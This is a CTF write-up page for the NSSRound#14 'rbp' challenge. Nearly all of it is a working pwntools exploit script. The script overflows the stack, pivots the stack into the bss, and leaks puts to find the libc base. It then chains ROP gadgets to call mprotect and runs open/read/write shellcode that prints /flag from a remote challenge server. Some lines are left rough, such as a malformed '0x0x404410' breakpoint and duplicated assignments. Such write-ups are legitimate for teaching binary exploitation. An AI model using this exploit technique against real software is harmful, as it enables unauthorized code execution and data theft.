from pwn import *
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(str(delim), data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(str(delim), data)
r = lambda num :io.recv(num)
ru = lambda delims, drop=True :io.recvuntil(delims, drop)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
ls = lambda data :log.success(data)
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h','-l','130']
def start(binary,argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([binary] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([binary] + argv, *a, **kw)
gdbscript = '''
b *0x0x404410
continue
'''.format(**locals())
binary = './rbp'
libelf = '/opt/pwn/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc.so.6'
if (binary!=''): elf = ELF(binary) ; rop=ROP(binary)
if (libelf!=''): libc = ELF(libelf)
io = start(binary)
io = remote('node2.anna.nssctf.cn',28681)
bss = 0x404800
leave = 0x4012bf
pay = b'A' *0x0210 + p64(bss) + p64(0x401292)
#gdb.attach(io)
s(pay)
pause()
pay = p64(rop.find_gadget(['pop rdi','ret'])[0]) + p64(elf.got['puts']) + p64(elf.sym['puts']) +p64(0x0401270) # vuln
pay = pay.ljust(0x0210,b'A')
pay += p64(bss-0x218) + p64(leave)
s(pay)
ru('\x40\x0a')
x = uu64(r(6))
libc_base = x - libc.sym['puts']
system = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
ls(hex(libc_base))
libc_file = '/opt/pwn/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc.so.6'
libc_file = '/opt/pwn/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc.so.6'
libc_rop = ROP(libc_file)
def f(Str):
return libc_base + libc_rop.find_gadget([Str,'ret'])[0]
syscall_ret = f('syscall')
pop_rax = f('pop rax')
pop_rdi = f('pop rdi')
pop_rsi = f('pop rsi')
pop_rbx = f('pop rbx')
pop_adb = libc_base + 0x0000000000090528 # pop rax ; pop rdx ; pop rbx ; ret
pop_adb = libc_base + 0x000000000015f8c5 # pop rax ; pop rdx ; pop rbx ; ret
pop_adb = libc_base + 0x000000000015f8c5 # pop rax ; pop rdx ; pop rbx ; ret
shellcode = shellcraft.open('/flag')
shellcode += shellcraft.read('rax','rsp',100)
shellcode += shellcraft.write(1,'rsp',100)
shellcode = asm(shellcode)
orw_rop = flat(
pop_rdi, bss-0x800, # rdi addr
pop_rsi, 0x1000, # rsi length
pop_adb, 0,7,0, # rdx per
libc_base + libc.sym['mprotect'], # 修改 权限
0x404448, # 此时栈已经 rwx了 所以直接返回到栈上执行代码
'\x90'*0x20,
shellcode
)
pay = orw_rop
pay = pay.ljust(0x0210,b'B')
#x = bss - 0x404610
#exe = 0x4045f0-0x1f0
#pay += p64(bss-0x1f8) + p64(leave)
#pay += p64(bss-0x1f8) + p64(leave)
pay += p64(0x4043f0) + p64(leave)
pause()
s(pay)
io.interactive()
[NSSRound#14 Basic]rbp imLZH1的WriteUp
2023-08-06 07:37・By
imLZH1
栈迁移栈溢出ORWgadgetROPgadget
还没有人赞赏,快来当第一个赞赏的人吧!
© 著作权归作者所有
加载失败
广告
×
评论区
添加新评论